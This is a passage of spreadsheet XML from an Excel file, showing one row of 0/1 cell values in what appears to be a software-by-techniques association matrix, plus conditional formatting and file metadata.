      <c r="IN271">
        <v>1</v>
      </c>
      <c r="IO271">
        <v>0</v>
      </c>
      <c r="IP271">
        <v>0</v>
      </c>
      <c r="IQ271">
        <v>1</v>
      </c>
      <c r="IR271">
        <v>0</v>
      </c>
      <c r="IS271">
        <v>0</v>
      </c>
      <c r="IT271">
        <v>0</v>
      </c>
      <c r="IU271">
        <v>0</v>
      </c>
      <c r="IV271">
        <v>0</v>
      </c>
      <c r="IW271">
        <v>0</v>
      </c>
      <c r="IX271">
        <v>0</v>
      </c>
      <c r="IY271">
        <v>0</v>
      </c>
      <c r="IZ271">
        <v>0</v>
      </c>
      <c r="JA271">
        <v>0</v>
      </c>
      <c r="JB271">
        <v>0</v>
      </c>
      <c r="JC271">
        <v>0</v>
      </c>
      <c r="JD271">
        <v>0</v>
      </c>
      <c r="JE271">
        <v>1</v>
      </c>
      <c r="JF271">
        <v>0</v>
      </c>
      <c r="JG271">
        <v>0</v>
      </c>
      <c r="JH271">
        <v>0</v>
      </c>
      <c r="JI271">
        <v>1</v>
      </c>
      <c r="JJ271">
        <v>0</v>
      </c>
      <c r="JK271">
        <v>0</v>
      </c>
      <c r="JL271">
        <v>0</v>
      </c>
      <c r="JM271">
        <v>0</v>
      </c>
      <c r="JN271">
        <v>0</v>
      </c>
      <c r="JO271">
        <v>1</v>
      </c>
      <c r="JP271">
        <v>0</v>
      </c>
      <c r="JQ271">
        <v>1</v>
      </c>
      <c r="JR271">
        <v>0</v>
      </c>
      <c r="JS271">
        <v>1</v>
      </c>
      <c r="JT271">
        <v>0</v>
      </c>
      <c r="JU271">
        <v>0</v>
      </c>
      <c r="JV271">
        <v>0</v>
      </c>
      <c r="JW271">
        <v>0</v>
      </c>
      <c r="JX271">
        <v>0</v>
      </c>
      <c r="JY271">
        <v>0</v>
      </c>
      <c r="JZ271">
        <v>0</v>
      </c>
      <c r="KA271">
        <v>0</v>
      </c>
      <c r="KB271">
        <v>0</v>
      </c>
      <c r="KC271">
        <v>0</v>
      </c>
      <c r="KD271">
        <v>0</v>
      </c>
      <c r="KE271">
        <v>1</v>
      </c>
      <c r="KF271">
        <v>0</v>
      </c>
      <c r="KG271">
        <v>1</v>
      </c>
      <c r="KH271">
        <v>0</v>
      </c>
      <c r="KI271">
        <v>0</v>
      </c>
      <c r="KJ271">
        <v>0</v>
      </c>
      <c r="KK271">
        <v>0</v>
      </c>
      <c r="KL271">
        <v>0</v>
      </c>
      <c r="KM271">
        <v>0</v>
      </c>
      <c r="KN271">
        <v>0</v>
      </c>
      <c r="KO271">
        <v>0</v>
      </c>
      <c r="KP271">
        <v>0</v>
      </c>
      <c r="KQ271">
        <v>0</v>
      </c>
      <c r="KR271">
        <v>0</v>
      </c>
      <c r="KS271">
        <v>0</v>
      </c>
      <c r="KT271">
        <v>0</v>
      </c>
      <c r="KU271">
        <v>0</v>
      </c>
      <c r="KV271">
        <v>0</v>
      </c>
      <c r="KW271">
        <v>0</v>
      </c>
      <c r="KX271">
        <v>1</v>
      </c>
      <c r="KY271">
        <v>0</v>
      </c>
      <c r="KZ271">
        <v>0</v>
      </c>
      <c r="LA271">
        <v>0</v>
      </c>
      <c r="LB271">
        <v>1</v>
      </c>
      <c r="LC271">
        <v>0</v>
      </c>
      <c r="LD271">
        <v>0</v>
      </c>
      <c r="LE271">
        <v>0</v>
      </c>
      <c r="LF271">
        <v>0</v>
      </c>
      <c r="LG271">
        <v>0</v>
      </c>
      <c r="LH271">
        <v>0</v>
      </c>
      <c r="LI271">
        <v>0</v>
      </c>
      <c r="LJ271">
        <v>0</v>
      </c>
      <c r="LK271">
        <v>0</v>
      </c>
      <c r="LL271">
        <v>0</v>
      </c>
      <c r="LM271">
        <v>0</v>
      </c>
      <c r="LN271">
        <v>0</v>
      </c>
      <c r="LO271">
        <v>1</v>
      </c>
      <c r="LP271">
        <v>0</v>
      </c>
      <c r="LQ271">
        <v>0</v>
      </c>
      <c r="LR271">
        <v>1</v>
      </c>
      <c r="LS271">
        <v>0</v>
      </c>
      <c r="LT271">
        <v>0</v>
      </c>
      <c r="LU271">
        <v>0</v>
      </c>
      <c r="LV271">
        <v>0</v>
      </c>
      <c r="LW271">
        <v>0</v>
      </c>
      <c r="LX271">
        <v>0</v>
      </c>
      <c r="LY271">
        <v>0</v>
      </c>
      <c r="LZ271">
        <v>0</v>
      </c>
      <c r="MA271">
        <v>0</v>
      </c>
      <c r="MB271">
        <v>0</v>
      </c>
      <c r="MC271">
        <v>0</v>
      </c>
      <c r="MD271">
        <v>0</v>
      </c>
      <c r="ME271">
        <v>0</v>
      </c>
      <c r="MF271">
        <v>0</v>
      </c>
      <c r="MG271">
        <v>0</v>
      </c>
      <c r="MH271">
        <v>0</v>
      </c>
      <c r="MI271">
        <v>1</v>
      </c>
      <c r="MJ271">
        <v>0</v>
      </c>
      <c r="MK271">
        <v>0</v>
      </c>
      <c r="ML271">
        <v>0</v>
      </c>
      <c r="MM271">
        <v>0</v>
      </c>
      <c r="MN271">
        <v>0</v>
      </c>
      <c r="MO271">
        <v>0</v>
      </c>
      <c r="MP271">
        <v>0</v>
      </c>
      <c r="MQ271">
        <v>0</v>
      </c>
      <c r="MR271">
        <v>1</v>
      </c>
      <c r="MS271">
        <v>0</v>
      </c>
      <c r="MT271">
        <v>0</v>
      </c>
      <c r="MU271">
        <v>0</v>
      </c>
      <c r="MV271">
        <v>0</v>
      </c>
      <c r="MW271">
        <v>0</v>
      </c>
      <c r="MX271">
        <v>0</v>
      </c>
      <c r="MY271">
        <v>0</v>
      </c>
      <c r="MZ271">
        <v>0</v>
      </c>
      <c r="NA271">
        <v>0</v>
      </c>
      <c r="NB271">
        <v>0</v>
      </c>
      <c r="NC271">
        <v>0</v>
      </c>
      <c r="ND271">
        <v>0</v>
      </c>
      <c r="NE271">
        <v>0</v>
      </c>
      <c r="NF271">
        <v>0</v>
      </c>
      <c r="NG271">
        <v>0</v>
      </c>
      <c r="NH271">
        <v>0</v>
      </c>
      <c r="NI271">
        <v>0</v>
      </c>
      <c r="NJ271">
        <v>0</v>
      </c>
      <c r="NK271">
        <v>1</v>
      </c>
      <c r="NL271">
        <v>0</v>
      </c>
      <c r="NM271">
        <v>0</v>
      </c>
      <c r="NN271">
        <v>0</v>
      </c>
      <c r="NO271">
        <v>0</v>
      </c>
      <c r="NP271">
        <v>0</v>
      </c>
      <c r="NQ271">
        <v>0</v>
      </c>
      <c r="NR271">
        <v>0</v>
      </c>
      <c r="NS271">
        <v>0</v>
      </c>
      <c r="NT271">
        <v>0</v>
      </c>
      <c r="NU271">
        <v>0</v>
      </c>
      <c r="NV271">
        <v>0</v>
      </c>
      <c r="NW271">
        <v>1</v>
      </c>
      <c r="NX271">
        <v>0</v>
      </c>
      <c r="NY271">
        <v>0</v>
      </c>
      <c r="NZ271">
        <v>1</v>
      </c>
      <c r="OA271">
        <v>0</v>
      </c>
      <c r="OB271">
        <v>0</v>
      </c>
      <c r="OC271">
        <v>0</v>
      </c>
      <c r="OD271">
        <v>0</v>
      </c>
      <c r="OE271">
        <v>0</v>
      </c>
      <c r="OF271">
        <v>0</v>
      </c>
      <c r="OG271">
        <v>0</v>
      </c>
      <c r="OH271">
        <v>0</v>
      </c>
      <c r="OI271">
        <v>0</v>
      </c>
      <c r="OJ271">
        <v>1</v>
      </c>
      <c r="OK271">
        <v>0</v>
      </c>
      <c r="OL271">
        <v>0</v>
      </c>
      <c r="OM271">
        <v>0</v>
      </c>
      <c r="ON271">
        <v>0</v>
      </c>
      <c r="OO271">
        <v>0</v>
      </c>
      <c r="OP271">
        <v>0</v>
      </c>
      <c r="OQ271">
        <v>0</v>
      </c>
      <c r="OR271">
        <v>0</v>
      </c>
      <c r="OS271">
        <v>0</v>
      </c>
      <c r="OT271">
        <v>0</v>
      </c>
      <c r="OU271">
        <v>0</v>
      </c>
      <c r="OV271">
        <v>0</v>
      </c>
      <c r="OW271">
        <v>0</v>
      </c>
      <c r="OX271">
        <v>0</v>
      </c>
      <c r="OY271">
        <v>0</v>
      </c>
      <c r="OZ271">
        <v>0</v>
      </c>
      <c r="PA271">
        <v>0</v>
      </c>
      <c r="PB271">
        <v>0</v>
      </c>
      <c r="PC271">
        <v>0</v>
      </c>
      <c r="PD271">
        <v>0</v>
      </c>
      <c r="PE271">
        <v>0</v>
      </c>
      <c r="PF271">
        <v>0</v>
      </c>
      <c r="PG271">
        <v>0</v>
      </c>
      <c r="PH271">
        <v>0</v>
      </c>
      <c r="PI271">
        <v>0</v>
      </c>
      <c r="PJ271">
        <v>0</v>
      </c>
      <c r="PK271">
        <v>0</v>
      </c>
      <c r="PL271">
        <v>0</v>
      </c>
      <c r="PM271">
        <v>0</v>
      </c>
      <c r="PN271">
        <v>0</v>
      </c>
      <c r="PO271">
        <v>0</v>
      </c>
      <c r="PP271">
        <v>0</v>
      </c>
      <c r="PQ271">
        <v>0</v>
      </c>
      <c r="PR271">
        <v>1</v>
      </c>
      <c r="PS271">
        <v>0</v>
      </c>
      <c r="PT271">
        <v>0</v>
      </c>
      <c r="PU271">
        <v>1</v>
      </c>
      <c r="PV271">
        <v>0</v>
      </c>
      <c r="PW271">
        <v>0</v>
      </c>
      <c r="PX271">
        <v>0</v>
      </c>
      <c r="PY271">
        <v>0</v>
      </c>
      <c r="PZ271">
        <v>0</v>
      </c>
      <c r="QA271">
        <v>1</v>
      </c>
      <c r="QB271">
        <v>0</v>
      </c>
      <c r="QC271">
        <v>0</v>
      </c>
      <c r="QD271">
        <v>0</v>
      </c>
      <c r="QE271">
        <v>0</v>
      </c>
      <c r="QF271">
        <v>0</v>
      </c>
      <c r="QG271">
        <v>0</v>
      </c>
      <c r="QH271">
        <v>0</v>
      </c>
      <c r="QI271">
        <v>0</v>
      </c>
      <c r="QJ271">
        <v>0</v>
      </c>
      <c r="QK271">
        <v>0</v>
      </c>
      <c r="QL271">
        <v>0</v>
      </c>
      <c r="QM271">
        <v>0</v>
      </c>
      <c r="QN271">
        <v>0</v>
      </c>
      <c r="QO271">
        <v>0</v>
      </c>
      <c r="QP271">
        <v>0</v>
      </c>
      <c r="QQ271">
        <v>0</v>
      </c>
      <c r="QR271">
        <v>0</v>
      </c>
      <c r="QS271">
        <v>1</v>
      </c>
      <c r="QT271">
        <v>0</v>
      </c>
      <c r="QU271">
        <v>0</v>
      </c>
      <c r="QV271">
        <v>0</v>
      </c>
      <c r="QW271">
        <v>0</v>
      </c>
      <c r="QX271">
        <v>0</v>
      </c>
      <c r="QY271">
        <v>0</v>
      </c>
      <c r="QZ271">
        <v>0</v>
      </c>
      <c r="RA271">
        <v>0</v>
      </c>
      <c r="RB271">
        <v>0</v>
      </c>
      <c r="RC271">
        <v>0</v>
      </c>
      <c r="RD271">
        <v>0</v>
      </c>
      <c r="RE271">
        <v>0</v>
      </c>
      <c r="RF271">
        <v>0</v>
      </c>
      <c r="RG271">
        <v>0</v>
      </c>
      <c r="RH271">
        <v>0</v>
      </c>
      <c r="RI271">
        <v>0</v>
      </c>
      <c r="RJ271">
        <v>0</v>
      </c>
      <c r="RK271">
        <v>0</v>
      </c>
      <c r="RL271">
        <v>0</v>
      </c>
      <c r="RM271">
        <v>1</v>
      </c>
      <c r="RN271">
        <v>0</v>
      </c>
      <c r="RO271">
        <v>0</v>
      </c>
      <c r="RP271">
        <v>0</v>
      </c>
      <c r="RQ271">
        <v>0</v>
      </c>
      <c r="RR271">
        <v>0</v>
      </c>
      <c r="RS271">
        <v>0</v>
      </c>
      <c r="RT271">
        <v>0</v>
      </c>
      <c r="RU271">
        <v>0</v>
      </c>
      <c r="RV271">
        <v>0</v>
      </c>
      <c r="RW271">
        <v>0</v>
      </c>
      <c r="RX271">
        <v>0</v>
      </c>
      <c r="RY271">
        <v>0</v>
      </c>
      <c r="RZ271">
        <v>0</v>
      </c>
      <c r="SA271">
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <conditionalFormatting sqref="A1:XFD1048576">
    <cfRule type="cellIs" dxfId="2" priority="2" operator="greaterThan">
      <formula>"0.1"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="1" priority="1" operator="greaterThan">
      <formula>0.1</formula>
    </cfRule>
  </conditionalFormatting>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Arbeitsblätter</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>6</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="6" baseType="lpstr">
      <vt:lpstr>Software</vt:lpstr>
      <vt:lpstr>Techniques</vt:lpstr>
      <vt:lpstr>Association</vt:lpstr>
      <vt:lpstr>Association_compact</vt:lpstr>
      <vt:lpstr>Vektordarstellung</vt:lpstr>
      <vt:lpstr>Datamatrix with timestemp and r</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Microsoft Office User</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-05T06:38:04Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-16T10:42:53Z</dcterms:modified>
</cp:coreProperties>
</file>